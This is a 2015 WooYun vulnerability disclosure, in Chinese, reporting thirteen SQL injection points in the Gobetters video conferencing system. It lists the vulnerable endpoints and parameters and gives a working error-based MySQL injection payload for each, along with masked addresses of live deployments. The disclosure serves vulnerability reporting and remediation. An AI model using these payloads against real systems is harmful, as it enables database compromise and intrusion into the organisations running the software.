Gobetters视频会议系统SQL注入漏洞打包 | wooyun-2015-0134733| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134733

漏洞标题：Gobetters视频会议系统SQL注入漏洞打包

漏洞作者：路人甲

提交时间：2015-08-19 15:53

修复时间：2015-11-19 17:00

公开时间：2015-11-19 17:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-19：细节已通知厂商并且等待厂商处理中
2015-08-21： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-08-24：细节向第三方安全合作伙伴开放
2015-10-15：细节向核心白帽子及相关领域专家公开
2015-10-25：细节向普通白帽子公开
2015-11-04：细节向实习白帽子公开
2015-11-19：细节向公众公开

简要描述：

危害比较大，可以直接写Shell
我像是刷的人吗？肯定不像，每个测试每个截图多辛苦～

详细说明：

总共是13处注入，最后一次打包，也不会再研究此系统啦~和乌云的进行了排重，都不存在重复，有些文件一样目录不一样哟~
厂商：
　　北京高百特科技有限公司是一家致力于网络多媒体通讯技术，并专注于为客户提供最佳网络通讯解决方案的高科技企业。公司创始人、核心团队都曾在互联网通信、网络教育、视频会议等行业知名企业任高层，对核心技术有深厚的积累以及对市场有深刻的理解。
　　作为在视频会议领域蓬勃发展的新兴企业，高百特推出了视频会议系统、远程培训系统、网络直播系统。基于大容量的系统架构设计，还能与ERP、OA、CRM等信息系统集成，做到真正的协同办公。并与相关行业结合提供各类行业的解决方案，全高清视频和高保真音质效果突破地域的限制，丰富的多媒体互动和数据共享功能让沟通更方便。
GET注入：

1、/web/seeserver.php?machineid=1&from=list   machineid存在注入
2、/web/department/deptsave.php?deptid=1&ac=del&level=0&parentid=0&dm=root  deptid存在注入
3、/web/android/dept.php?lan=1&deptcode=1     deptcode存在注入
4、/web/c/index.php?deptcode=1&username=1&userpass=1    deptcode存在注入
5、/web/onelanding/onelanding.php?username=1&deptcode=1  username、deptcode存在注入
6、/web/systemconfig/guangbo.php?id=0&action=del&page=
7、/web/device/dept.php?deptcode=1
8、/web/users/depttree.php?deptid=1

POST注入：

9、/web/users/usersave.php                    userid参数
   POST：from=123&deptid=0&deptname=123&userid=30001&level=123&username=admin&realname=admin&userpass=admin&sex=1&sex=1&email=%40&mobile=123&telephone=123&roleid=0 
10、/web/department/departmentsave.php         deptlogo参数
   POST：deptid=1&deptcode=1&deptlogo=1&deptdesc=1
11、/web/monitor/monitormentsave.php          deptlogo参数
   POST：deptid=1&=1&deptcode=1&deptlogo=1*&deptdesc=1 
12、/web/monitor/monitorsave.php               equipment以后的参数都存在
   POST：ac=11&rt=1&id=1&rtnum=1&equid=1&equid=1&parentid=1&from=1&equipment=1*&equipname=1*&equid=1*&equipid=
1*&equippwd=1*&equipip=1*&equipport=1*&equipnum=1*&orgid=1*
13、/web/users/result.php
   POST：username=1

Case:

http://**.**.**.**/web/index.php    demo
**.**.**.**:7921
**.**.**.**:89
http://**.**.**.**:89
**.**.**.**:89
**.**.**.**
**.**.**.**/web/index.php 
**.**.**.**:89

漏洞证明：

Security Testing:

第一处：/web/seeserver.php?machineid=1&from=list
Payload:' AND (SELECT 6632 FROM(SELECT COUNT(*),CONCAT(0xc,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VwMT'='VwMT



第二处：/web/department/deptsave.php?deptid=1&ac=del&level=0&parentid=0&dm=root
Payload: AND (SELECT 3593 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)





第三处：/web/android/dept.php?lan=1&deptcode=1  
Payload:' AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ninq'='ninq





第四处：/web/c/index.php?deptcode=1&username=1&userpass=1
Payload:1' AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ninq'='ninq





第五处：/web/onelanding/onelanding.php?username=1&deptcode=1
Payload:' AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ninq'='ninq





第六处：/web/systemconfig/guangbo.php?id=0&action=del&page=
Payload: AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)





第七处：/web/device/dept.php?deptcode=1
Payload:' AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ninq'='ninq





第八处：/web/users/depttree.php?deptid=1
Payload:-7276 OR ROW(1355,6771)>(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM (SELECT 8443 UNION SELECT 5201 UNION SELECT 3389 UNION SELECT 2860)a GROUP BY x)





第九处：/web/users/usersave.php 
Payload:
 OR ROW(1355,6771)>(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(user() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM (SELECT 8443 UNION SELECT 5201 UNION SELECT 3389 UNION SELECT 2860)a GROUP BY x)





第十处：/web/department/departmentsave.php
Payload:' AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ninq'='ninq





第十一处：/web/monitor/monitormentsave.php
Payload: AND (SELECT 8709 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- tanc





第十二处：/web/monitor/monitorsave.php 
Payload:AND (SELECT 8709 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- tanc





第十三处：/web/users/result.php
Payload:' AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ninq'='ninq